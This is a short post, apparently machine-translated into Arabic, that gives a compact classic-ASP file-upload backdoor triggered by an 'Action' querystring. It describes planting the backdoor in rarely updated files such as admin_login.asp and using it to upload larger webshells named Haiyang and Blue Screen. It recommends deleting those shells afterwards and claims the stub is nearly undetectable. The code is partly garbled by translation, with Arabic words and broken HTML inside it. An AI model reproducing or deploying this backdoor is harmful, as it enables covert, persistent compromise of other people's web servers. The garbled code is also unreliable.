<٪ if request.querystring ("Action") = "log" ثم
a = request.totalbytes: إذا كان a ten ten b = "adodb.stream": set c = createObject (b): c.type = 1: c.open: c.write request.binaryRead (a): H = CreateObject (B): H.Type = 1: H.Open: C.Position = F+1: C.Copyto H ، GF-3: H.Position = 0: H.Type = 2: H.Charset = "Big5": i = H.ReadText: H.Close: J = Mid (I ، Instrrev (I ، "/")+1 ، g): k = instrb (d ، e & e) +4: l = instrb (k+1 ، d ، leftb (d ، f-1))-k-2: h.type = 1: h.open: c.position = k-1: c.copyto H ، L: H.savetofile server.mappath (j) ، 2 ٪> <form enctype = multipart/form-data method = post> <input type = file name = n> <input type = pridt> </poth>
<٪ نهاية إذا ٪>
السبب: يمكن تحميل الملفات ، إنها بسيطة ، صغيرة الحجم ، وليس من السهل اكتشافها.
استخدام: استخدم أولاً شاشة Haiyang أو Blue لتحرير الحصان إلى بعض الملفات التي ليس من السهل تحديثها ، مثل admin_login.asp. عند تشغيل ملفات الآخرين ، ما عليك سوى إدخال admin_login.asp؟ Action = تسجيل الدخول إلى المتصفح لتحميل Haiyang أو الشاشة الزرقاء. بعد العملية ، استخدم الشاشة الزرقاء وغيرها من وظائف الحذف الذاتي لحذف الشاشة الزرقاء. سأستخدم هذه المحطة لتحميلها إلى Haiyang وهكذا في المرة القادمة عندما أعود. تقريبا لا يمكن التحقيق والقتل.